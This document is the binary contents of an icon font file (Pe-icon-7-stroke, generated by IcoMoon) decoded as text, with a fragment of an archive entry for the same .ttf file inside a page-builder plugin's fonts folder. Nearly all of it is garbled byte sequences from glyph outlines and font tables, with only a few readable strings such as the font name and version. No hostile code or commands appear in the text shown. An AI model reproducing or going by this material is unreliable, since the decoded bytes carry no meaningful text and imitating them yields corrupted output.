	+��'8ER_ly����������"/HUn{0&1%&!"3!267>54&'.##!"&5463!2%"32654&#4&#"32657"32654&#"32654&#4&#"3265'"32654&#2654&#"3"32654&#3"32654&#'"32654&#2654&#"3"32654&#3"32654&#'2654&#"37"32654&#"32654&#"32654&#5"32654&#5"32654&#"3267>54&'.#"&54632#"3267>54&'.#"&54632#���#��		z	��z�^��kk^�����onn7�								NUD	��		�����@3go��3�3
		
"#



""��27<E"32654&#3"32654&#%#5##";35326=4&#%3#5#537#5##5!x



3



*^�^^�^�������gV�V�







DUU�DD�DDD�x��Dff��X�h%'7%'7��޼��3��޻���kkk�k��kkk�3��73#5#"&'.5467>753267>54&'.'�^'
D''D

%+ K**K -���""3&EE&2"&8*K  K* 9&3)��
%5##!#'3#53#5##53#5353353!<x���gVV��x��gVV�x���m**��D*�""�x33��""�+��1="3267>54&'.#"&'.5467>32###33535#,N!!N,,N!!N,)GG))GG)	vvww�!N,,N!!N,,N!�gG))GG))GDwvvf-��
'-x�4��u��*��������'I/?>?'77>7>323''?06?7'7>'&"#"'�e]T�-�O		
O'-VN'aZ_V'VU��e[d(UV,'O			P�,�OW�YU`��VU'We$��5!3!#!!#!!��o;�;��o��*���oWE��E3�4�E��x����',7<#";267>54&'.#+"&=35#3#546;23#5q�		�		�������44��b��KOO`��"������=jot''&"326?.#"01"1023267>7>76&'7'>7>753461425263>7>32'7'7�D����

 A��
	'&	Ve,e,�,�,��D����P		B��
'%	ee,e,E,�,�+��77'%'7�L�V�wF�G;і����E4�уw��/����KPm54&'.#!"#"372#35#54&'.+1#"&=46;3!267>=35##53#!"&'.=467>3!2�	��

�
"U"�	�33�	��			�		
;
;��;

;		�w��]		F		F3��-=#"3!#'53#3753!"5467>3"&'.5467>3!!�		
T�*.Xw?;���	D���
		��	
��'(��56�����

M<��..#"5!!#7>54&'!337#57>32�
	K��DLM���#�A���K��L
	��"�%��X�
�X�h7'577'5���������h��kk���kk�+��):?DINS#03:3:3267>541!"&=3+%#!>7>5!3#53#53#57#35#53�f
			U45c
��/U	b
��"��������������r

i�gzs
	"

	b��D�<怀o^^+��	-6O3#53#53#5%4&'.'*#"326764=7'5#"&5467>;1+������3w1ee#
�%5WLM� (

��		
#�
A		��


3����;Tm.'.#"3267>517.'.#"3267>5<51"&'.5467>32#%"&'.5467>32#��	

	
	�
	



	
��				�d�


	


X�



		
'�?		^				�����1;EU5467>7>=#3267>=4&'.'#5#467>7#5"&'.=3#	


+//+ff%�%fo(�(W	**	,..,|w&&w�'bb'�1Jc|�"3267>54&'.#"&'.5467>32#%"3267>54&'.#"&'.5467>32#'"3267>54&'.#"&'.5467>32#3



�



�UUUUU+��$J3267>7#"&'.5467>773267>7#"&'.5467>71� J*
%3)I
%/#<"O-&E'$'C�
*I 	&

 H*2%
&	(D%-O"=$
D&"
"��%!3#35#53!!�D�;�;�U��fq3��DD"��o����5]%267>=4&'.#"3467>32#"&'.=#"&'.=###35#5#>7>=##

#"



"M






�//2M�L2z
"�"



"�"




�

�UU..UU4UU4U3O�q	!5!!5!!5!7!!5!5!7!!53��f���x�w��fx����fx��qDD3""�DD3""�DD3""+��
!'1'77'7'77'q^fooffod�UUfUUgUUfUU�/38��8448f3��*@+��**A+��**@+��**A+��U����3Oi2'.'.5467>3267>54&'.#"35">7>54&'.#1"&'.5467>32#1 8��8 



#>	��	>#				�8 
	
��
	
 8�	
				
	�>$
	�	
$>�				+X�h !!#"/!57326?!%'7�g���f��oo
n//n��{ooh����oo��m//m
oo�+����#,1'.#"!'%762'.#"'71571762!%'7Ժ���r��{-.{	fopc
����{qq������{..z	�n�p{	����pq+����).5>CHMR'.#"#!'5'62#7'.#"'537'751571762!%'7%3#53#553#5Ժ)=U�BB�TJ3(-.'��:C	
po
����{qq�xxxxVV�(>U��B�B�-4�(..'�:�B	-pn��	����pqmf3D��#(G#"&'.=#3267>=##53!#53"&'.=33267>=3#VfD''DfUDD��DDg#>D
&&
D>#����&EE&�3333�x>#��%%��#>qO@w7"&'.5467>321#35#'#.'.#"3267>7'#%">7>32#"&'.'1'33267>54&'.#G���#

#		"<!	
((
	
"		
	#

#	98

((3���
##
	!<!((
�	
##

88((Fz1Jc|�"3267>7.'.#"&'.'>7>32#5"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32##@>"7E++J  56  J*&>299%B22B&%%%%







				z9$857��1!210�%%%%�



�



g				U��#(%54&'.#"#!5#'467>32#5!5!o((<V<�
##
����4�f((f��f"



"ff�������w�7F375#3#'553##'3"3267>=4&'.##"&=4632�;x;���;VVXV/�--



	�3g��fg3�"""^��'QM^	"		"	<""+��2m%"&'.'7326?>54&/.#"'7>32#"&'./.546?>32'.#"3267>?#

	k
		
		LLk�k

	k
		


HH�		

	l		
		
KKl	�	k	

	l		GG	+!��&N2'.'.5467>32>7>35".'.#"7>7>54&'.#1^%��%+��	
+�%
	��		
%				+
��
+U����/4A�4&'.#"1202135467>71>7>553#"&54632#8##5>7>54&'.#"#54&'.'041"4#04#.'.5467>32�>##>
		�		
�ff3



\*		*	8  8	-#>>#'
	xx
	
'��33"



j
"��"

# 88 #+��16"3267>54&'.#"&'.5467>32#'3#5,N!!N,,N!!N,)GG))GG)n���!N,,N!!N,,N!�gG))GG))G�<��1Jc|�����+D]v���7"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#267>54&'.#"352#"&'.5467>3"3267>54&'.#"&'.5467>32#o���UwU;	

	V

<UwU;	

	V

<UU	

	V

+O�q.9H%''77'7!3;267>?>7>5735+"&/!7#!"&='!?3334
33
4�V�S�	>1
��
p�3333333�"
��
"�
���

  +��#<U267>54&'.#"35#3#35#"3267>54&'.#"&'.5467>32#



3E,N!!N,,N!!N,)GG))GG).



#�;!N,,N!!N,,N!�gG))GG))G*��
#5#77'3535335'#5##57UE<��ֈ""xDx��"UfU���U"f<���D""D��ww̚��ww����
3��2M\x�����"3267>54&'.#"&'.5467>312#?'>7>54&'.'7.'.'7'.'.#1"'>7>32'>7>7.'.5467>77.'.'7381267>7#"&'.'7'>7>7*K  K**K  K*#

##

#fA@8@
+	
I+



+



�+
@
	CA@@	*	
I,+



�*	@
	� K**K  K**K ��
##

##
�+


+

:+
@
B@@@
+
I+

+


�+
?
	CAA	?
+	
+��1dq"3267>54&'.#"&'.5467>32#"3467>323467>7>7>54&'.#"32654&#,N!!N,,N!!N,)GG))GG)							





�!N,,N!!N,,N!�gG))GG))G4
				

		
�



+��%#####5##5#1!5�UUUU���w���ff���3��
!!''!5777!3��f�qMU32x��54UMm����f�J�=x":?��="v=�������r����""&#"'>54&'.#".#"3267>54&'.'732673267>54&'.'7:3267>54&'.#"&'.5467>32#7"&'.5467>32#"&'.5467>32#"&'.5467>32#�	P
Q		V			V
P		P		��



�



�



o



�	�C
	�			�C			
�		�3
		
�				w	

	"	

	+��(1FU%4&'.'1#13267>7178175>7>5'5"&'.5467>7#7'7� K**K !N,
 "�4"�)GD'p

uh�
�+L""L+,N!&2OC�*��G)'F Ǥ'�C-#
+��*9GUdx�������':81818#"32018181267>54&'.#267>7#5=#'"&'.'>7>7#467>73#>7>7.'.'3;".'.5.'.'>7>352=3.'.#73.'.'>7>554&'.'>7>7#7.'.''.'.'>7>7>7>7.'.'>7>7,M!!M,,N!!N,	LM	^]		]M	ML]^		^&


�	

^

	
�


�!N,,N!!N,,N!	M\
\\
mM	M

M	^\
\\
mM	M

�
	
6	


��
	

6	


f����
37#773#7,a�a��q�q��ճ�<���"�uKMf%#.'.#"'&".'.#"#";3267>5<573267>732654&#"&'.5467>32#!"&'.5467>32#�$"

"$$''$�� 

 !!!! 

 �"





""
'

'
"g        3��)26Ohqv{>7>54&'.#".'.#"#!##537'3'#772#"&'.5467>3467>32#"&'.573#533#553#i			



			d�dS�
*%��

<

�

H%*
�����ų�F
	

	
��D��H@"V

3

E@H��������31��$4?#54&'.+"3!267>=4&'.#%46;232!5!"&=!#��VV��
V
�
��g��
x
d	���
	


<��
��
f$��+[0#"&'.'.'.#"35>32326?5#"&'.'.'.#"5>323267>7�+$
					
%						
&.		
					

						
	
�
������"��
%#5'!'357!3f���UD���������˛k��
'#!1'#533!���*�qq�w�����f	yqq��x��3��#5#357'737355#35#7'#35#��zz�czz��z�cz�zzc���czzzzc���zc�znzz�3��	735#73#5%35#37%35!#33����3�l~}��x�������3�~~bͼ���<��4Pi��4&'.#"3>7>5"&'.5467>32##3267>54&'.'"&'.5467>32#75#35>7>54&'.'"&'.5467>32#�	

*				��
	
					�	



�		��#



�#��		D



恁��D



^����"C%4&5'113267>54&'.'"&'.5467>7041701#��x;"";�5}}5��"�	

!;;!

	�4
		��		
4+O�q*#!5'3##"&'.5#7!533267>73x�^�]��M�

�N4�xy





yqf��fU		U��
		
�U=��7'#73!35#!�WWB4o��o�VWWB����"��E	 ��$).38!33#!5#5335!!'#35#53;#553#53#5!!5!!5�4"��"��"3��f�ffDD4wwwwww������++3��"���ggVEEV+^3"��
7P%!377'53!!''777'"3267>54&'.#"&'.5467>32#�D�PQQP�U��f�3"5'0$7/]



u3��!----!"���GBk�dbGL�$	

	V

3��
#!!'#53!33533#53#53#5w���V"��g��V�
L�w������fDVxx��x��L��V44�33��	'\!!!5!!!3#5;#5#335#"735#37>32#"&'.=#3267>54&'.#3��f���x��x��o�m!d8F




��f�MM����^�_�(H



��2@P]0"+1!*1"5#35#5>7>57>54&'.#'.546320313#"&'.=!7532032�1��
K2D�D2K
��?	2//P?2	�
K3��3K
m?
\//ooR?\
��#(3'3#!5#%7!3#33#33#33#33#�D��>"�"������33D33D33D44E33���nn�������+��%7'!5##3!3535#!!���33"DD�����X
33��44������F�z!,7<AR!"3!267>54&'.#!!5#!"&=!%5463!2!3#553#5326=4&+"3�f		�		�^��V��f��V��V"��ff3"

"

z
�


E""�����3D	

	B��	
"'##!53'#533##55'#533#�W�hhW>>��V�>>VVE�VVjVE��E%>>>�iYV��R>>���V4V��+��Xq��73#'#5'.'./'7'.'./#537>7>?'77>7>?53267>54&'.#"3#'#3735>7>77'>7>735#.'.'7'.'.'51"&'.5467>32#1

$,-!$!	
4
	!$!-,$

4



+V!<!/1#<$
V
$<#1/!<!+



�)$	

4
	!$!//!$!	
4

	$)��



"- <!
V$<$33$<$V
!< -��



3����*C\aei>54&'.#"3267>54&'.''2#"&'.5467>3"&'.5467>32#'?77'7 		%? K**K ?% 



'DD''DD'f�B�AJ+R'8,R&�		$E&+J  J+&E$6
		
�DD''DD''DUB�A�w,'S ,&R3-��3@MZ!";53267>=4&'.#+'#"&=463!2'"32654&#3"32654&##"32654&#����C#
4+�

V
�



D



�



��
DD
��
,,
�

ހ











<����%).38%35!3267>753#5"&'.=!#!5!3#5;#5'3#5�D�x;" :33�5"5�D��U�E���";8 xgg�5oo5"�MMMMff>�;n20132+!"&'.5467>?>7>327>7>35".#"3!267>54&'.#4654&'.#1*

��	
		
%
			

%="

"0q)




			

	
%
#"

03��17"3267>54&'.#"&'.5467>32#5#35#*K  K**K  K*'DD''DD'fw� K**K  K**K �wD''DD''D��+��1H"3267>54&'.#"&'.5467>32#'&"326?64'&",N!!N,,N!!N,)GG))GG)k�09��!N,,N!!N,,N!�gG))GG))G�09�+��5!333535#5!###'#5!U�ր�D*����o�*7�5��DD�U�oU�77����6Ohm!'#33267>54&'33267>54&'.#1#'37#"&'.5467>323#"&'.5467>32/!#�PCS		x			��E��
		
�				�)J:�Fx��
		

			"��

		

		^��+>��+Haz��#'0"9.+"1#"3!267>=4&'.##!"&=46;77>;232'"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#�F)
U
(H

f


��

OU.N
�((((#

##

#







O)(���

�
.
��((((�
##

##
�



�



3����L�"&'.'.'.5467>?>32367>13>321#"3267>76&'.'.#"'"&'.'.'.7>7>?64'.'.#w0?*
		 
	
7
�	

(=+			4!	;(&@.	C

	)"%

�	+>%'9		
#
$)
Bf��	&7>ELSZaho35#73#57#";267>54&'.#+"&546;2'5#35#5#35#5#35#75#35#35#35#5#35#5#35#35#35#�������

�


�

�
�D"D"D3D3DwD"D3D>DD3""<��V��

V

���3DU3DV4E�3D3DU3DV4E��+��	!!!5!!!!!5#3#5;#5+��V��x��x��x^��E#��V�DD�x3��o����'7'''77��������	��������QT��SS;��JJ��+HHHH�JJ��3 ��
/@!3!35!!!5!3267>=4&'.+"3'46;2+"&=�fx"��V��x�||	|		|	�o��o���MM�%+��5FW#".+";201235154630213267>54&'.#46;2+"&5!+"&546;2��

�

�		�

��
�

�
�
�

�
�
��

	

"
��"

��



"

��SmKU^|��"'35##'35#01.'.#"3267>7326?3267>54&'.#'#.'.'7#7"&'.5467>32;#7'3"&'.5467>77'>32#�	* <�9$	#

#!
FN

##

#�>3@L

&O

�>�G�

$$


S"&?
#"


�4

"



"#
&{	6{6V

C		[{{[

	HG

3��0>%54&'.'54&+"!5'!575467>32267>5#3�,

,<�<+��</.<�	V	��0

0�00;1�..�1M		qOCQ;5#"#"&=46;%4&'.#54&'.+32+3267>=267>552#	��	���"
	����	
36�	�	���^#	�	#"D+��&@N\v�"3267>54&'.##>7>7'2#4&'.'>7>3#>7>73.'.'"&'.'>7>53#7.'.53,N!!N,,N!!N,ę#
�

	
4
	

`�
#d�#
�

	
4
	

`�

#�!N,,N!!N,,N!�+'#0�),,)'+0#�*'"0�),,)'*0"+>��#3.'.+'77524&'.'5�,E43����;4
YOaF;(Epp!��U0+P%&6V��!!3#5"32654&#����n�		��p�"��]�ww� ����>W%'7>7>54&'.#".'.'7'73267>77467>32#"&'.5�"L2	3
				

	3	.L"
$;! :$
��

XF+3		
	



	
		��*F220-*��	!!!!!!57!!5�4��V��g��x"D��h��U��3��g"+��*COZfrx"73267>77'>7>54&'.#"&'.5467>32##"3755467>;17#354&'.#1'132#35#'D,
+
$$
*,
D'#??##>>#M3
pf		"�3p
Df"		�^p�E'"
5446"'E��>#$>>$#>�
3pf"		p3
wf		"x�3-��!3!'37#%#'#5!�f�X4X���tt�0�33�x��ff����f<<����aA77'7'�
UTTTTU
TA
TTTTTT
U+��1=3267>54&'.#"#"&'.5467>32'77'7'iO))OO))O"H&&HH&&H�
UTTTTU
TwO))OO))O��H&&HH&&H�
TTTTTT
U��`'77'`TT0`
UT0*��19%267>54&'.#"32#"&'.5467>3'77',N""N,-M""M-(HH()GG)aUT0!N,,N""N,,N!�G)(HH()G�`
UT0��?@%7'73aTT1�`TT0*��1973267>54&'.#"!#"&'.5467>327'7*"M-,N""N,-M"�H()GG)(H�aTT1�,N!!N,,N""N,(HH()GG)aUT0��-@77'7'�`TT0�`TT0*��19%4&'.#"3267>5!467>32#"&'.577'7'�"N,-M""M-,N"�fG)(HH()G�`TT0�,N""N,,N!!N,)GG)(HH(`TT0��`77''�`TT0�aUT0*��19"3267>54&'.#"&'.5467>32#'7''-M""M-,N""N,)GG)(HH(
aUT1�"N,,N!!N,,N"�fH()GG)(H�aUT06�	y7'7'#57<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#�ML88�1$		
	
%oo

	
	
*

xx"

#�
LL7��7i1


%


			*


##
���	y%'75377<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#ALM88b0$
				

&oo

		
*



xx"



"JLL8��8�1


%


			*





"#

A�16<DLQV[`"3267>54&'.#"&'.5467>32#'!5!!5!!5#!5#!5#!5#3#53#5%3#53#5






���m���qI���J�����2222
22224

T

���8��(��"�������5'7'7577'57'wflqk�yu�^^bb�flqk�yu��^^��bb��a�"',37'#5##3#33535#5'5!!!'7!%3#53#5�u33u��v22v���$$����$$��TT�TT+<:""v;;��vT)+2T**u�	��	!&+�3#53#553#5'5##!##53'3#53#5!!7.'.'"&5467>5>76&'4"14676&'.'#0"#3581025>7>7>54&'.'5'0&'<14656&'467>73101213<54&'
uuuuSSC�������""�����m�	




e2�33��q""2TT2""����K
				
			
��%/:S#7'7'.#"723267>5<57'.'.'7/77"&'.5467>32#�50�wY4>^D4_w_KG�K0

6Y....3`50kwZ4>`E4`__L
G�sM15B.--.��q�1|73267>54&'.#"72#"&'.5467>37'#"&'.5467>77'"3>7>323.'.#5267>72:!!::!!:�4444_
(F
'* J)
#	




	#

�!::!!;;!�4444��.F(3$.
(8*K#��5Pk#935151511'#53717>7>54&'.'7>7>54&'.'7>7>54&'.'�{_`zdTTd8D



4					
	
	
	
�bLKaa�b�NNvP?v�	

	





= $$ "&(#7-32,.56/0���w73:3:130233:3:13023:3265<54&'.'.'"&5467>7>76&'<1&676&'.'.+"0.'.'&45467>7>76&'041&676&'.'.+"01#467>7>7>54&'./.'&6715061516&'&67>7>731!5'467>7>7>54&'.5/.'&4=3<1536&'467>7>739#5H
Z		
Z	


	
	
				

�
		
	

��

	


u�
			
		
		
						
			



	
	**
	
		��i�"3267>54&'.#>7>7>7>='"&#"&'>7>737>7>321#"#"&'.'7.5<1063267>7.'.51.'.#"#3210.'.5467>32�)J  J)*I  I*n
			
			
		�9		

9C&'C
�I**II**I��!



				





	

 !! 
	&&CC&&��1:%4&'.#"3267>5!467>32#"&'.5%7'735�!M+,L!!L,+M!�mF((FF((FffQ�+M!!M++M!!M+(FF((FF(
ffR��I�w1Z%4&'.#"3267>5"&'.5467>32##32+3267>54&'.#.7777�1111ɀe11e� 77 �7777�11111177G�w\g������7'.'>7>'.'.3267#.'.'.7>7>73#3534&15#.'.5#35#'7'>%.'&67>76&'&'.'&67>763#5;#5!3#5!3#5��j-



(D

N262E��3$��




33�22��33P22�OKB	

:
	

	



PgD



f

]��7<AFLQW"#33267>54&'.#"&'.'35#>7>32#5#3=#37!!#531!!!!1�









::


���
������\��~�,				

�

3C�2Cv����?�~���`����1:7267>54&'.#"32#"&'.5467>37'#3�+M!!M+,L!!L,(FF((FF(
ffQ��!M++M!!M++M!�F((FF((F��ffR��JZd%1"1#"&'.5&6777>?7'7''7''326?>327.#"'7#"&'.5467'7-�
 !

/0HG0GG/0''�!"
�0v/

��



 
0/GG0GH0/&&�

�/v0v
��.Y3:377'7'..'.'645./?117>76.7>?'1.'./#"#"&'&	z��z#",�`Y3�	

,";	,"#z��z	&�aM*�3(���>7>312#"&'./1'.'.5467>7>7>32'.#"3267>7>54&/.'.#"'.'.5467>7"
		
�
cv	��

�	
				�			���

�dv��
	�		�	
		��



����	 >S73#53#53#5.'.#"#!#5467>32#>7>?!33.'.'53e���Ɇ��	
		���S
�	���
�	
��CC.		�L�&���
		
�n��"'%5#535#3##35#53#35#'3#5#533#53GuK�LuL�L�L�L�����놆�*��*����ۇ���������''5#9373717717537#31'515�r{`?kvc~��Ud{>�Vs�r]bLKkvd�uP?zNCZ`l��.�'AZs�>7>=#3267>54&'.''53353.'.#".5"&'.5467>32#5"3267>54&'.#"&'.5467>32#�
�
77 �ST



\1111$$%

%




" AA #		)77)	w0ss0D%J�|1111�
%$$%
�



��S�%4&'.+>7>54&'.#"#*132;267>54&'>7>54&'>7>54&'>7>5#32+32+32+1#"&'.'.+5:3:3267>7>7>54632134132#�
	�			9[


�


&o
	J	


g<
�
N
�
			�&!*E��1:"3267>54&'.#"&'.5467>32#'7'35#�,L!!L,+M!!M+(FF((FF(
ffR���!M++M!!M++M!�mF((FF((FffR����%I3#54&'.#"357'57'>7>5#5'.'.5467>32m~++

T*)

Q$$2		
%%
		CC2++"�;!**"^##/1�%

%��h�����"5467>;267>7#+"189.'.#"381267>7>7>3:3:1:323812654&'.#9"&'.'.'.+"#9"&5467>323267>7>7>32#%##33535#7"3267>54&'.#"&54632#7"3267>54&'.#"&54632#\


#
%


)/
		
/)
F					2					#
		

		
#��""""�				C					


&
#	L23

32L�%0FF0%�!""				"				"0��	#(-26:!!#535#535#535#53#3#535#535#535#537'5��\C22222222
��C33333333�uuCC���`��CCSDDTDDTCC�>_�CCSDDTDDTCC�DD''N��1f�	l�7267>54&'.#"352#"&'.5467>3>54&'.#181"813267>7465'0010101'>54&'.#818101*#81'>7>71>7>783>3:1263:3263:3201201"1"#0#'>70"1"#"*#"*1"#0#**1*#"&'.'<5<5<7<1467>781>7>781813267*1'#"&'.5467>32�				

�!M+7&!L,'F%d

	T
		$A"-	8dT'D 
S
8	
		
�				C				3
+M!(	

+M!A%<	
S
<#qh=	:C&

S

h�
	

0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>731211?''77,







	Y

Y	
	��

	
	

G,,,,,,,�	
		
		C*	
	



		*�+,,+,,,��1:73267>54&'.#"!#"&'.5467>327'5#!L,+M!!M+,L!�F((FF((F��ffR�+M!!M++M!!M+(FF((FF(
ffR��0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>73121175##33535,







	Y

Y	
	��

	
	

CCCC�	
		
		C*	
	



		*�CCCC��	'@Yr!!3#!!'267>54&'.#"32#"&'.5467>3267>54&'.#"352#"&'.5467>3#"&54632�3++���o�!;;!";;"4444

��f���x��x��;"";;"";35555�U"��29HW735#3.'.#">7#3757>7>54&'.'5#73>7>32''7g0D'0&-2*
�:*<7;:�
	�O$)*#��=��g0(E0	
�9<6;+9�*3.&��
��
#**$������-C!!570513830292.'.#"0+81'7526324&'.'3!U��ͫUE2	(!{{4E/-

'�����@t:m
%-SS x/M
&!3$������ )6CP]jw��'.#"326764''7'77'789'#"&54632#"&54632'#"&54632#"&54632#"&54632#"&54632'#"&54632#"&54632�l��lL�mal`tlgmh�llll0T0�0U1\l��lL�lam`slglg�mllm�00�01	-��%>K�����7"3267>54&'.#"&54632#%"3267>54&'.#"&54632#7'.'.+"#333267>=33267>=354&'.'535#%>7>;2!7#"&'.=3!#"&'.=37!5467>3!2^











#	�<7			�		
7;��	�
��
	34

4�g
U
�

4



4

4



xD

D
ww
	?RQ��				�ff��'#'+7#'3'#7'353�d�d���UV�Y�WmW�Te����5xx	��ffggdddu�������1Mm"3267>54&'.#"&'.5467>32#74&'.#"3'>7>5#?'.'.5467>32�,N""N,,N""N,(HH()GG)E	
		
$�#
Y

	

�!N,,N!!N,,N!�gG))GG))G�	



		ff
	�O


	P��1Gc.'.#"'73267>?7'7>56&'#"&'.'.546?7'7>7>32�=#)�		$$	

�&!=

��		�A��M=	
	=�>#(�
##�'"=

��		�A��L>	

	=#�/T7>54&'.'.#"3#33535#5267>7'>7>32#"&'.'.5467�







EEDD
�	

		

	�6666
EDDE
�
	/0	/0Fz!&+0%#5#5##5###3335335353553##33#37#5324D�E3443E�D42�E""U""�""4##�f+��+ff+��+fg��+����+������ %'7'777''7/7''7��

�	^��]�y``*sar`=`_�
��	^��^	�yaa+r`r`�aa����Vdiw%4&'.#"33151"5467>32.'.+32675#35>7>7>7>5<515.'.5467>7#5375�"N,,N"
%
H()G


VU&	��				�33f				�,M""M,W&�&(HH(&
�
	3
W��F�
����HWp������%5#4&'.'7'.'.'5#'#3735>7>77'>7>53'#.'.'7"&'.5467>32#7.'.#5'"'>7>7#>7>73.'.573.'.'5267>77'>7>73�<
**  ++<<
** !++
>MfI	�

sJ	
{J
vIf	+fH
7H	
{	H
vHf	� ++::++ !++=<++ 
H

<�Ii
-hI	9H


|	H
tGf
,fH
8G

+�&6F535!3#!5#54&'.'>7>5#5467>7'.'.=3�,��+
	"!

	++,	

!"		�	
##
	Z#	
�	
#?ee


XX


�XX

q	ee	���?%4&'.'35>7>557'5#'.'.5467>700--�6*,8'++'�+K !::! K+(5^^5(�B6*�Q,8�."%B55B%".��	"'?'3#5;#53#553#5'7'7/7���DD�EEDi0000�1
0��EDD�DD+11�11�00��&?7.'.#"3267>54&'.'77"&'.5467>32#���	555	�)�[//..��555

���(��/../����#(AJO%'5>7>54&'.#"'77557467>32#"&'.5'5357573	
	3��w���ff#				fw33wff�h		^8�8DD�D�)�*�B				��E�KB�<3�3�����,B'!!7'5815#*1">7>31021021358=!3>7>3:7ޫ���U�{{!(	13���'
./DQt@�w:SSS-%
 �hg$3 '
M.�����(8Ng�%1'54&'.#"3267>?3'%467>325#"&/.546?357#.103267>5&4'"&'.5<59>7>7#f�
F`	
		zi4�EĀ
a��G�34		6�

kG	
`{5�DZ̀`�l}��#IJ#		.				����*/45##;267>5#'3#5+"&'.533#5;#5��3
�
3xgg��͉4>����

www�t

��s++++��1J!!77!5!5!5''5!'267>54&'.#"352#"&'.5467>3��Uxv<Y�}��w�]<xx�^				

		��f���~w3Z �VVy`3w}��				E
		
������(A%#.'.'467>7.#&"'>54&'.#".'.5467>7'3267>?33:3>3326?>764/>7>73267>=.'.#%467>32.'.5+#"&/#*'./#*/.'&4?'.'.5467>3:27>7>732'#"&'.5467>32�
		
		

				



		

		��

		

^	


	

B&
	
	^�


		








	
		

			�		

�		

	


4

			
	8	$��1j������"3267>54&'.#"&'.5467>32#7>54&'.#"'>54&'.#".'.#"75''73267>54&'73267>73267>77#"&'.5467>32'2#"&'.5467>32#"&'.5467>3'557�				
		


�			
		
		&�� ��
	
	

	
ɼ�

�

U�����F				D				<						�bc�jV		
		U|				L				3				LW�X��W�X��!?C%7'>7>54&'.#2'7%467>7735"&'.57'7Hz0
 K*'D+8C��
4z' J+'D\
8B�}0
+J D'

-iD:
� 
5})#+J D'�D:
	��U�1MQajoty"3267>54&'.#"&'.5467>32#<5<54&'.'!'#73#5467>77#<5<53#5;#5#3#5�								U
  UUU�11��					11^+Vi				E	

	s0"
)$$*	#0jkZ??�"

"�??
aUU3333
����HR\fpz����%75'.'.'7'.'./#'737>7>77'>7>774654&5'.'.'7'3"&#"#77'57''7#'239263'"&'.5467>7>7>312#7'>7>7�DD&'3
@
5'%DD&'3
@	4''333N&�"�':33N%�" 8 8
�'�@
3'&DD%'5
@
4''DD&'6
8!
�&:33N&�"�&;33D8 8 
(D�%10>7>5<1'.'.=7'77'7'��>*+=��6&%7���3333333��.((.���(%

%(�؃4344344��1Vo�"3267>54&'.#"&'.5467>32#7&#"&'.'.3267>76&''#"&'.5467>323#"&'.5467>32�+J  J+*K  K*'DD''DD'j

!!�				�



� J++J  J++J �wD''DD''D�	

	\								����Vc|�#357'7'.=>7>54&'.#"3267>54&'.'57>=354632#"&5#"&'.5467>323#5�;;##6	
	C		
G�



�				+z;):�	::	��6(

(
C0		vG);g



��				^����hm����.'.#"73267>54&'.#"'.#"3267>74&'77'.'&677'>7>327''7>32#"&'&47#"&'.5467>327'7'7� 	A	R*T

A
***+

+))�O�rBAQ*T

A63***45)
))+���
��x����)41'7'77>?357'#"&'.'.'37!.7>?�YIH
�II530)�g/0�$5��
N��Z34HH�IH0)��	$6#
N�>s��_<�Вd~Вd~��������3++3UU^+3<*3<7G^+3+"33+fx+/3<++3�+"o3+U+++DU�++U+<++*3++3++f33f"k33<^+U"33+B+33<3+++3f+3+3++ +3�+�*�*�*�*�a��r��������������.�����������������#���+����������V�E����
��~�2nJ��t��	@	j	�

�J|��
z
�r��
��.P��6N��@��Jl�V�pF��Z��j��v�� ` �!!�""�#4%�&&�&�((�(�)*4*�,|,�-N..^.�//$/\/�0t0�11>1�22F2�3L3�3�4:4t5�6J6�77�88z8�9D:0;;�;�<<l<�=�>">�?^?�?�@L@vA$ALAfA�A�B4BHB�B�CC"C|D$D�EZE�E�F�G\HH�J�K�LL�M�NNlOO�PPP�QQ<RR�SVS�UUtWXXzX�Y�Z�[2[�\V]x]�^P^�_d_�_�`�a�b6b�b�c<c�dd�ee�gZh�ii�j�k2k�l�m�m���� � 6 � V
4�	 	�	 6	 �	 	 f	
4�Pe-icon-7-strokeVersion 1.0Pe-icon-7-strokePe-icon-7-strokePe-icon-7-strokeRegularPe-icon-7-strokeFont generated by IcoMoon.PK!87}p�p�4flex/sppagebuilder/fields/fonts/Pe-icon-7-stroke.ttfnu&1i��0OS/2"��`cmapU� LgasphglyfƳ>�p��headE	��d6hhea��ݜ$hmtx}~�8loca��b��maxp��� namevͫ���post�P �LfGLf��@������  8
 ����� ���������7979793��,1Jc#54&'.#!"3!2654&#%!2!5467>3!!'3267>54&'.#"3#"&'.5467>32�8�������b��xx				D



W/��+E//��"�ޑ						+��'@35#7'#537'"3267>54&'.#"&'.5467>32#�F::FR"<<,N!!N,,N!!N,)GG))GG)V:�:v!4�!N,,N!!N,,N!�gG))GG))G+��)D_�35#7'#5377>7>54&'.'>7>54&'.''>7>54&'.'"&'.5467>327.'.#"3267>7'#�F::FR"<<�		

))Y)GG)&
"*,N!!N,*"
&V:�:v!4`
  

""
�

						



�G))G
!N,,N!
mS2Kd"#>7>54&'.#"3!267>54&'.#467>32#"&'.5"&'.5467>32#�*
�
*****��

$#

#$

|#

#$



$S*



*****s$

$$

$b
$$

$$
O�q"3:54&'.#!"3!267>=35##!"&=463!27#'573�n	��			p*,���usOBJ		�		KC����F1E�3��z�"3267>54&'.#2.'.'.5467>7>76&'0&14676&'.'.'#0#.'.5467>3>7>7>54&'.'4&'.'&476456&'&67>7>73#"&'.'*K  K**K  K*'D






D'�
	


		
%$
� K**K  K**K D'!



	!'D��			

U����%7'735#!#3!KWWB4o4o����WWB���"��E��U��#(%#5467>32354&'.#"#!5#!5!w�
##
((<V4#��4�f"



"""((f��������_�5#7467>323467>323267>5##"&=1467>323467>323>54&'.'".'.#".'.#".'.#">7>32.'.#	3Z"!'	


		
	'!"Z3�

	

	



(  T//T  (�)"#[3�		�
3[#")�
		

		

		
	.Q""Q.	^��$/>CGK#54&'.+"#3;267>535'46;2#51+"&51533#'�UVU
�
�
V
x�
�
�x!��

��

D

��

